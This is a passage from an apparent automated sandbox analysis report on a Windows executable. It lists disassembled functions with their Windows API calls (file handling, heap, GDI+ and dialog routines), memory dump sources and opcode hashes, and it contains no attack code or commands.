                                                                                              • Opcode Fuzzy Hash: d3543707c85aac9dabacb2b2620d9e7067afafccd770ab7e3761d7d9258e02d4
                                                                                              • Instruction Fuzzy Hash: E4317A7190424AAFCF11DF98D955AEEBBF6BF09304F24006EF845A7251CB325E00DB60
                                                                                              Function 00CA9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CA73BC,?,?,?,00000000), ref: 00CA9DBC
                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00CA9E70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$BuffersFlushTime
                                                                                              • String ID:
                                                                                              • API String ID: 1392018926-0
                                                                                              • Opcode ID: 6dca8e7239a7c81993cfe4a33acc5279718348e3f153fb8b37b06952a76f5777
                                                                                              • Instruction ID: 02bdfcfc4330122cc2bb46f624630084cfa334420d4c10ee8aa659808a3331a9
                                                                                              • Opcode Fuzzy Hash: 6dca8e7239a7c81993cfe4a33acc5279718348e3f153fb8b37b06952a76f5777
                                                                                              • Instruction Fuzzy Hash: 4421D2312492469BC714CF34C492AABBBE4EF56308F08491DF4D587151D339EA4C9B62
                                                                                              Function 00CA966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00CA9F27,?,?,00CA771A), ref: 00CA96E6
                                                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00CA9F27,?,?,00CA771A), ref: 00CA9716
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: f2447513e94661ea6b15516d194e6ef03063c4e61daab4a69ac431dda3fd9bdd
                                                                                              • Instruction ID: fde1b36afc92f7dc3b0b0c2c5d51ba37b2c696322a7d52a0fe8018eaa8bb42d4
                                                                                              • Opcode Fuzzy Hash: f2447513e94661ea6b15516d194e6ef03063c4e61daab4a69ac431dda3fd9bdd
                                                                                              • Instruction Fuzzy Hash: E021CFB11007456FE3708A65CC8ABE7B7DCEF4A328F100A19FAA6C61D1C774A9849631
                                                                                              Function 00CA9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00CA9EC7
                                                                                              • GetLastError.KERNEL32 ref: 00CA9ED4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: 3079eba4a550e81371bad2d1c3e086984c46d0c9071644d94481ae5038256e44
                                                                                              • Instruction ID: eb3217e0c59380d224cdc218d4cd61a8ccb525f830594c7ce9713221139e3357
                                                                                              • Opcode Fuzzy Hash: 3079eba4a550e81371bad2d1c3e086984c46d0c9071644d94481ae5038256e44
                                                                                              • Instruction Fuzzy Hash: B311E570600706ABD724C629CC42BA6B7E8EB46364F544A29E563D26D1D770EE45C760
                                                                                              Function 00CC8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00CC8E75
                                                                                                • Part of subcall function 00CC8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CCCA2C,00000000,?,00CC6CBE,?,00000008,?,00CC91E0,?,?,?), ref: 00CC8E38
                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00CE1098,00CA17CE,?,?,00000007,?,?,?,00CA13D6,?,00000000), ref: 00CC8EB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$AllocAllocate_free
                                                                                              • String ID:
                                                                                              • API String ID: 2447670028-0
                                                                                              • Opcode ID: a8b744473fde5bc5433a219189c93fdfe4da232df3c26d20875711fdda9ffacf
                                                                                              • Instruction ID: 29a2eed75e1b94908cb53bde9ce9d2ea9c217d5b8a8575170bfb803c8c5ff984
                                                                                              • Opcode Fuzzy Hash: a8b744473fde5bc5433a219189c93fdfe4da232df3c26d20875711fdda9ffacf
                                                                                              • Instruction Fuzzy Hash: C5F0213A60110566CB212A2ADC05FAF375CCFC2770F55012DF82497191DF71CE04A1A0
                                                                                              Function 00CB109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 00CB10AB
                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00CB10B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                              • String ID:
                                                                                              • API String ID: 1231390398-0
                                                                                              • Opcode ID: 253f64a2752f3694e8c7e7debffe9e71f6738264fdf63d993fd0895d07630e4d
                                                                                              • Instruction ID: 83b3ca13fdfddc602e8bf99415219872a3d5de13031281507f68c0836879ca68
                                                                                              • Opcode Fuzzy Hash: 253f64a2752f3694e8c7e7debffe9e71f6738264fdf63d993fd0895d07630e4d
                                                                                              • Instruction Fuzzy Hash: 03E0D832B10185A7CF0997B4AC15AEF73EDEA44204B188176EC13D3101F934EF414760
                                                                                              Function 00CAA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA501
                                                                                                • Part of subcall function 00CABB03: _wcslen.LIBCMT ref: 00CABB27
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA532
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: 700f7bc483269ef9f32f540b0b5bc078b69e8c904031551d6366052646a86bd6
                                                                                              • Instruction ID: a1177e5b6625da57317e09edb4fdffd53282b339027e8cff585b328b6f7f4563
                                                                                              • Opcode Fuzzy Hash: 700f7bc483269ef9f32f540b0b5bc078b69e8c904031551d6366052646a86bd6
                                                                                              • Instruction Fuzzy Hash: 22F0393224024ABBDF015F60DC45FDE3BACAB05789F888062B949D6160DB71DF98EA65
                                                                                              Function 00CAA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(000000FF,?,?,00CA977F,?,?,00CA95CF,?,?,?,?,?,00CD2641,000000FF), ref: 00CAA1F1
                                                                                                • Part of subcall function 00CABB03: _wcslen.LIBCMT ref: 00CABB27
                                                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CA977F,?,?,00CA95CF,?,?,?,?,?,00CD2641), ref: 00CAA21F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2643169976-0
                                                                                              • Opcode ID: b2a5138ddf844dfc5315a2162918383e67322da012c5012d1a172bc7e58f5643
                                                                                              • Instruction ID: e511136b5bcd46315caf47c1acdd58d5ad91512591086a619ce92fbe6bcfdd86
                                                                                              • Opcode Fuzzy Hash: b2a5138ddf844dfc5315a2162918383e67322da012c5012d1a172bc7e58f5643
                                                                                              • Instruction Fuzzy Hash: 89E0923514020A6BDB015F60DC45FDE379CAB09785F484021B949D2050EB61DE98EA65
                                                                                              Function 00CBAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00CD2641,000000FF), ref: 00CBACB0
                                                                                              • CoUninitialize.COMBASE(?,?,?,?,00CD2641,000000FF), ref: 00CBACB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: GdiplusShutdownUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 3856339756-0
                                                                                              • Opcode ID: a1b6a0b5997c2d4f86e5c5a6a13338ab6d83040b2d605e96ef50362f111b2808
                                                                                              • Instruction ID: a98ae74203f2d5aaeb2b85cbbd162b6231aa8e0db11f5a89e04075cb85cffeeb
                                                                                              • Opcode Fuzzy Hash: a1b6a0b5997c2d4f86e5c5a6a13338ab6d83040b2d605e96ef50362f111b2808
                                                                                              • Instruction Fuzzy Hash: 49E06572504650EFC7009B58DC46B49FBACFB88B20F00426AF416D37A0CB74A801CA95
                                                                                              Function 00CAA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00CAA23A,?,00CA755C,?,?,?,?), ref: 00CAA254
                                                                                                • Part of subcall function 00CABB03: _wcslen.LIBCMT ref: 00CABB27
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00CAA23A,?,00CA755C,?,?,?,?), ref: 00CAA280
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: 261d46f67ce0f21cba8bf5ce5cabd0bec294324c092a14e24b285c243a26797e
                                                                                              • Instruction ID: f86576aa38e3041fee3fa81fe1ae213f610e785259a7b0c37ba6c094237f844f
                                                                                              • Opcode Fuzzy Hash: 261d46f67ce0f21cba8bf5ce5cabd0bec294324c092a14e24b285c243a26797e
                                                                                              • Instruction Fuzzy Hash: 76E092315001245BCB50AB64DC09BE97B98AB0D3E5F044261FD59E3190D770DE44CAA1
                                                                                              Function 00CBDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00CBDEEC
                                                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 00CBDF03
                                                                                                • Part of subcall function 00CBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBB579
                                                                                                • Part of subcall function 00CBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB58A
                                                                                                • Part of subcall function 00CBB568: IsDialogMessageW.USER32(0001046E,?), ref: 00CBB59E
                                                                                                • Part of subcall function 00CBB568: TranslateMessage.USER32(?), ref: 00CBB5AC
                                                                                                • Part of subcall function 00CBB568: DispatchMessageW.USER32(?), ref: 00CBB5B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2718869927-0
                                                                                              • Opcode ID: d95b7dfc803530c832f01742a217632b30cfd053ba9fb5d223cd3e92644dab62
                                                                                              • Instruction ID: 491766edba2a3d1c4d00e06ccb89996b0b0ba846c22dfaae2acf46582c249073
                                                                                              • Opcode Fuzzy Hash: d95b7dfc803530c832f01742a217632b30cfd053ba9fb5d223cd3e92644dab62
                                                                                              • Instruction Fuzzy Hash: BAE0D8B240038D2ADF02AB60DC07FDE3BAC9B05789F040851B205EB0F3DA78EA14A771
                                                                                              Function 00CB081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CB0836
                                                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAF2D8,Crypt32.dll,00000000,00CAF35C,?,?,00CAF33E,?,?,?), ref: 00CB0858
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1175261203-0
                                                                                              • Opcode ID: d884e75d5a783cccfc8f7189b8d786a28d50963914016e3b8b07e73dba185825
                                                                                              • Instruction ID: 7de1448d144bc4672e2e2cd13836fd5492be9851b478ab42395583664c9046ab
                                                                                              • Opcode Fuzzy Hash: d884e75d5a783cccfc8f7189b8d786a28d50963914016e3b8b07e73dba185825
                                                                                              • Instruction Fuzzy Hash: D0E04F768011686BDB11ABA4DC49FDB7BACFF097D1F040066B649E2044DA74EF84CBB0
                                                                                              Function 00CBA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CBA3DA
                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00CBA3E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: BitmapCreateFromGdipStream
                                                                                              • String ID:
                                                                                              • API String ID: 1918208029-0
                                                                                              • Opcode ID: 5547c8ef3c87d8783d9156778135fec0879bd5ae3c9f9917d889cc4dc0b1ef46
                                                                                              • Instruction ID: f84a387e1cfec4a92455aa0481fdf45e12910402f0e5a2bd0425e8469ff496ad
                                                                                              • Opcode Fuzzy Hash: 5547c8ef3c87d8783d9156778135fec0879bd5ae3c9f9917d889cc4dc0b1ef46
                                                                                              • Instruction Fuzzy Hash: 15E0ED71500218EBCB10DF55C5416D9BBE8EF04760F10805AA99693211E374AE44DBA1
                                                                                              Function 00CC2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CC2BAA
                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00CC2BB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                              • String ID:
                                                                                              • API String ID: 1660781231-0
                                                                                              • Opcode ID: 378f96bd0d964ee3a7223b8ccf5ba6cd78930245e9a872515626fc50e8f69641
                                                                                              • Instruction ID: c7455d5be9e04bfba86586052cbafc87900aa3627f069572d09c9cbc4fccbe21
                                                                                              • Opcode Fuzzy Hash: 378f96bd0d964ee3a7223b8ccf5ba6cd78930245e9a872515626fc50e8f69641
                                                                                              • Instruction Fuzzy Hash: 0FD022341643009A8C147E75F82BF5D3385AD41B70BA083DEF033894C1EE1099C0B021
                                                                                              Function 00CA12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3351165006-0
                                                                                              • Opcode ID: 36875bbd1d41359cb48bd6d6f47aa791c3bc1843f111ef685cf25e78da402bd5
                                                                                              • Instruction ID: c239820125071563d5b0fb2beadc8dd3405bb22c2b4d20d196b34534715283a4
                                                                                              • Opcode Fuzzy Hash: 36875bbd1d41359cb48bd6d6f47aa791c3bc1843f111ef685cf25e78da402bd5
                                                                                              • Instruction Fuzzy Hash: 19C0123205C300BECB010BB4DC09E2BBBACABA9312F04C90CB0A9C0260C238C120DB62
                                                                                              Function 00CA1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
